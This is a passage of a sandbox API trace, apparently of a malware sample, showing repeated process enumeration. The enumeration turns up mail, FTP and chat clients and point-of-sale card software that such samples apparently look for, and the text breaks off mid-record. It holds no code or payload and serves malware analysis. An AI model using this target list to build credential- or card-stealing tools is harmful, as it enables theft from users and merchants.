pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0269.283] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0269.286] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0269.289] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0269.408] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0269.411] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0269.414] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0269.419] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0269.422] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0269.424] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0269.427] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0269.527] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0269.531] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0269.534] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0269.537] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0269.541] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0269.643] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0269.645] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0269.647] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0269.649] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0269.650] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0269.654] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0269.656] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0269.658] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0269.661] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0269.663] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0269.665] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0269.821] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0269.853] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0269.856] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0269.858] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0269.860] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0269.862] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0269.865] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0269.867] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0269.870] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0269.874] CloseHandle (hObject=0x1018) returned 1 [0269.874] Sleep (dwMilliseconds=0x64) [0270.039] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0270.406] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.408] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0270.410] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0270.412] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0270.414] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0270.437] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0270.440] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0270.442] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0270.445] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0270.447] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.453] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.456] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0270.458] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.460] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.462] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.468] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.470] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.473] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.475] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.477] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0270.511] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0270.563] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0270.566] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.569] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0270.574] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0270.577] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0270.579] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0270.581] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0270.583] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.586] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0270.588] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0270.594] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0270.597] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0270.599] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0270.601] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0270.603] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0270.654] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0270.656] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0270.658] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0270.660] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0270.662] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0270.664] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0270.665] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0270.670] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0270.672] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0270.674] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0270.676] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0270.678] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0270.680] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, 